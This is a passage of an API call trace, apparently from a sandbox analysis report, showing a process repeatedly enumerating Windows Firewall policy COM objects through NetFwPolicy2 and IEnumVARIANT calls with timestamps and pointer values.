NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.354] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.354] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.355] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.355] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.396] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.396] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.397] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.397] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.397] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.398] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.398] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.398] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.399] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.399] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.399] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.399] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.400] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.400] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.401] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.401] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.401] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.401] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.402] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.403] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.403] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.403] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.404] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.404] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.404] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.405] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.405] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.405] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.406] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.406] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.406] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.406] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.407] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.407] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.408] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.408] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.408] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.408] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.409] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.409] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.409] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.410] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.410] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.410] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.411] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.411] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.411] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.412] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.412] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.412] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.413] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.413] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.413] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.413] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.414] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.414] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.415] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.415] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.415] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.415] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.416] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.416] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.416] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.417] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.417] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.417] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.418] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.418] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.418] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.419] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.419] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.419] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.420] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.420] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.420] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.421] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.421] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.421] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.422] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.422] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.422] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.422] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.423] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.423] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.423] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.424] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.424] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.424] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.425] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.425] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.425] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.425] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.426] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.426] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.426] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.427] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.427] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.427] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.428] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.428] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.428] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.429] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.429] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.429] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.430] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.430] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.430] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.430] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.431] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.431] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.431] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.432] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.432] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.432] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.433] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.433] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.434] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.434] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.435] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.435] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.435] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.436] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.436] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.436] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.437] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.437] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.437] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.437] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.438] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.438] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.438] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.439] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.439] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.439] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.440] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.440] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.440] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.440] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.441] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.441] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.441] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.442] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.442] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.442] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.443] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.443] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.443] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.444] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.444] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.444] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.445] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.445] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.445] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.445] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.446] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.446] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.446] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.447] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.447] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.447] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.448] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.448] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.448] IEnumVARIANT:Next (in: 